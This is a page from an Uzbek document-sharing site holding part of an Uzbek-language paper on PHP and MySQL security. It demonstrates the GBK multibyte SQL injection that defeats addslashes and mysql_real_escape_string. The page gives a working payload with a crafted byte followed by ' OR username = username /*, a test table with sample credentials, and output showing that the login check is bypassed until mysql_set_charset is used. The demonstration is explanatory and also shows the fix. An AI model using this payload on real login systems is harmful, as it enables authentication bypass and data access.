Shuningdek, O’zbekiston Prezidenti 7-fevral kungi farmoni bilan 2017




Download 67,89 Kb.
bet21/24
Sana20.05.2024
Hajmi67,89 Kb.
#246484
1   ...   16   17   18   19   20   21   22   23   24
Bog'liq
Shuningdek, O’zbekiston Prezidenti 7-fevral kungi farmoni bilan -hozir.org

Test natijalari:
MySQL .

mysql> select version();


+---------------------+
| version() |
+---------------------+
| 5.0.45-community-nt |
+---------------------+
1 row in set (0.00 sec)

mysql> CREATE TABLE users (


-> username VARCHAR(32) CHARACTER SET GBK,
-> password VARCHAR(32) CHARACTER SET GBK,
-> PRIMARY KEY (username)
-> );
Query OK, 0 rows affected (0.08 sec)

mysql> insert into users SET username='ewrfg', password='wer44';


Query OK, 1 row affected (0.02 sec)

mysql> insert into users SET username='ewrfg2', password='wer443';


Query OK, 1 row affected (0.03 sec)

mysql> insert into users SET username='ewrfg4', password='wer4434';


Query OK, 1 row affected (0.00 sec)


PHP

echo "PHP version: ".PHP_VERSION."\n";

mysql_connect();


mysql_select_db("test");
mysql_query("SET NAMES GBK");

$_POST['username'] = chr(0xbf).chr(0x27).' OR username = username /*';


$_POST['password'] = 'guess';

$username = addslashes($_POST['username']);


$password = addslashes($_POST['password']);
$sql = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
$result = mysql_query($sql) or trigger_error(mysql_error().$sql);
var_dump($username);
var_dump(mysql_num_rows($result));
var_dump(mysql_client_encoding());

$username = mysql_real_escape_string($_POST['username']);


$password = mysql_real_escape_string($_POST['password']);
$sql = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
$result = mysql_query($sql) or trigger_error(mysql_error().$sql);
var_dump($username);
var_dump(mysql_num_rows($result));
var_dump(mysql_client_encoding());

mysql_set_charset("GBK");


$username = mysql_real_escape_string($_POST['username']);
$password = mysql_real_escape_string($_POST['password']);
$sql = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
$result = mysql_query($sql) or trigger_error(mysql_error().$sql);
var_dump($username);
var_dump(mysql_num_rows($result));
var_dump(mysql_client_encoding());
Natija

PHP version: 5.3.3


string(29) "ї\' OR username = username /*"
int(3)
string(6) "latin1"
string(29) "ї\' OR username = username /*"
int(3)
string(6) "latin1"
string(30) "\ї\' OR username = username /*"
int(0)
string(3) "gbk"
Men yuqorida aytib o'tgan xarakterli tafsilot: PDO-da yaqin vaqtgacha ulanish kodlashni o'rnatish umuman imkonsiz edi. PDO'da mysql_set_charset () ga o'xshash funksiya yo'q va DSN 5.3 versiyasidan oldin faqat charset parametrining modeli mavjud edi , u xato bermadi, lekin hech qanday kodlashni ham o'rnatmadi.
PDO hamma narsadan qanday himoyalanishi haqida gapiradigan belgilarni troll qilish qobiliyatidan tashqari, hech qanday maxsus narsa yo'q .



Download 67,89 Kb.
1   ...   16   17   18   19   20   21   22   23   24




Download 67,89 Kb.

Bosh sahifa
Aloqalar

    Bosh sahifa



Shuningdek, O’zbekiston Prezidenti 7-fevral kungi farmoni bilan 2017

Download 67,89 Kb.